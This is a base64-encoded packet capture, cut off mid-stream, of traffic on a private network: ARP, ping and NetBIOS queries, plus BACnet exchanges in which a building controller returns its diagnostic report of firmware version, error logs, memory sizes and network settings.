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LrAusAB5Y2ygQoB3QEAMB0GEA4yBV5l/gHKY2hhbmdlZCBmcm9tIDA0LzA4LzIwIDE3OjIzOjE5IHRvICAgMDQvMDgvMjAgMTg6MjM6MjgNCiAgQ2xvY2sgY2hhbmdlZCBmcm9tIDEyLzMxLzc5IDAwOjAwOjAwIHRvICAgMDQvMDgvMjAgMTc6MjM6MTkNCiAgTW9kdWxlIGZvcm1hdHRlZC4gUFJHIGRhdGFiYXNlIGNsZWFyZWQuICAgLS0vLS0vLS0gLS06LS06LS0NCiAgUG9zc2libGUgYmF0dGVyeSBmYWlsdXJlLiAgICAgICAgICAgICAgICAgLS0vLS0vLS0gLS06LS06LS0NCiAgQ2xvY2sgY2hhbmdlZCBmcm9tIDEyLzMxLzc5IDAwOjAwOjAwIHRvICAgMDQvMDgvMjAgMTc6MjE6MTgNCiAgTW9kdWxlIGZvcm1hdHRlZC4gUFJHIGRhdGFiYXNlIGNsZWFyZWQuICAgLS0vLS0vLS0gLS06LS06LS0NCiAgUmVzZXQgY291bnRlcnMgY2xlYXJlZC4gICAgICAgICAgICAgICAgICAgLS0vLS0vLS0gLS06LS06LS0NCiAgTWVzc2FnZSBsb2cgY2xlYXJlZC4gICAPzxaOXpsjDQBBAAAAQQAAAAAAAAAAAAAAAODJIKoAUlQAEjVACABFAAAzALUAAIAR4bGsGAAUrBgAD7rAusAAH1iEgQoAFwEEAgQeBsQCgAADDjIHKCIByg/PFo5eoFMNAAcCAAAHAgAAAAAAAAAAAABSVAASNUAA4MkgqgAIAEUAAfkAFgAAQBEgi6wYAA+sGAAUusC6wAHlPlyBCgHdAQAwHgYQDjIHKGX+AcogICAgICAgICAgICAgICAgICAgLS0vLS0vLS0gLS06LS06LS0NCg0KQVJDMTU2IHJlY29uZmlndXJhdGlvbnMgZHVyaW5nIHRoZSBsYXN0IGhvdXIgKGNsZWFyZWQgdXBvbiByZXNldCk6DQogIFRvdGFsIC4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uIDANCiAgSW5pdGlhdGVkIGJ5IHRoaXMgbm9kZSAuLi4uLi4gMA0KDQpDb3JlIGJvYXJkIGhhcmR3YXJlOiANCiAgQ29yZSBFRVBST00gaW52YWxpZCwgY2Fubm90IHJlcG9ydCBoYXJkd2FyZSBkZXRhaWxzLg0KQmFzZSBib2FyZCBoYXJkd2FyZTogDQogIEJhc2UgRUVQUk9NIGludmFsaWQsIGNhbm5vdCByZXBvcnQgaGFyZHdhcmUgZGV0YWlscy4NCg0KRnJlZSBoZWFwIHNwYWNlID0gNjI5NzkyLg0KDQpEYXRhYmFzZSBzaXplID0gMTI1NDk4NDIgLCB1c2VkID0gMjg0MzIyLCBmcmVlID0gMTIyNjU1MjAuDQoNCkZsYXNoIHN0b3JhZ2Ugc2l6ZSA9IDI4N